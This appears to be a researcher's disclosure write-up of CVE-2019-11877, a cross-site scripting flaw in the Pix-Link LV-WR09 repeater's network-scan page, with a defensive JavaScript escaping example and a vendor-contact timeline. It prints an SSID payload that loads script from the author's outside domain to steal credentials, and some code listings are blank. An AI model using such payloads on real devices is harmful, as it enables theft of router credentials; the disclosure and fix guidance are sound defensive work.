[CVE-2019-11877] Credentials Stealing Through XSS on Pix-Link Repeater

I needed a wifi repeater for my house and bought a Pix-Link LV-WR09 because it was one of the cheapest. I thought “What could go wrong with that?”

When I entered the repeater configuration page, I saw that the network listing function could be vulnerable to a Cross-Site Scripting attack through a wifi network with a malicious BSSID.

I used my smartphone to create a wifi network named


And did the test:

Yes! It’s vulnerable!!

Now it’s time to make a real attack.

The SSID has the restriction to fit a maximum of 32 characters, so I registered a small enough domain:


I changed the SSID on my smartphone to <script src=//ilrg.xyz></script> and in the index.html I put my script:

Now I just need to go to the settings page of the repeater and scan for available networks.

It will run the XSS and send the data to a file on my server.

It worked!

With this we have a POC!
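
On the defensive side, the fix for a listing like this is to treat every scanned SSID as untrusted bytes and encode it for the HTML context before it reaches the page. The following is an added example, not code from this post or from the Pix-Link firmware; the function names, the row markup and the scan data are assumptions made for illustration.

```javascript
// Added example: not the repeater's firmware. Names and scan data are constructed.

// An SSID is 0-32 arbitrary octets chosen by whoever runs the access point,
// so the scan-results page must handle it as untrusted input.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

function escapeHtml(text) {
  return text.replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Decode raw SSID octets for display: reject oversized values and replace
// invalid UTF-8 and control characters with U+FFFD instead of passing them on.
function ssidToText(bytes) {
  if (bytes.length > 32) throw new RangeError('SSID longer than 32 octets');
  const text = new TextDecoder('utf-8').decode(bytes); // non-fatal: bad bytes -> U+FFFD
  return text.replace(/[\u0000-\u001f\u007f-\u009f]/g, '\uFFFD');
}

// Unsafe pattern (assumed): the SSID is concatenated into markup as-is.
function renderRowUnsafe(net) {
  return '<tr><td>' + ssidToText(net.ssid) + '</td><td>' + net.channel + '</td></tr>';
}

// Hardened: every scan-derived field is encoded for the HTML text context.
function renderRowSafe(net) {
  return '<tr><td>' + escapeHtml(ssidToText(net.ssid)) + '</td><td>' +
    escapeHtml(String(net.channel)) + '</td></tr>';
}

function renderTable(rows, renderRow) {
  return '<table>' + rows.map(renderRow).join('') + '</table>';
}

// Constructed scan results; the second SSID is modelled on the one in the post.
const enc = new TextEncoder();
const sampleScan = [
  { ssid: enc.encode('HomeNetwork'), channel: 6 },
  { ssid: enc.encode('<script src=//ilrg.xyz></script>'), channel: 11 },
];

// The hardened table shows the SSID as text; no script element is created.
console.log(renderTable(sampleScan, renderRowSafe));
```

Output encoding is the primary fix; a Content-Security-Policy on the admin pages that disallows external script sources would limit the impact if an encoding step is missed elsewhere.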

Sources that served as inspiration:





28/04/2019 — First email sent to the vendor (no answer)

06/05/2019 — Second email sent to the vendor (no answer)

15/05/2019 — Third email sent to the vendor (no answer)

27/05/2019 — Disclosure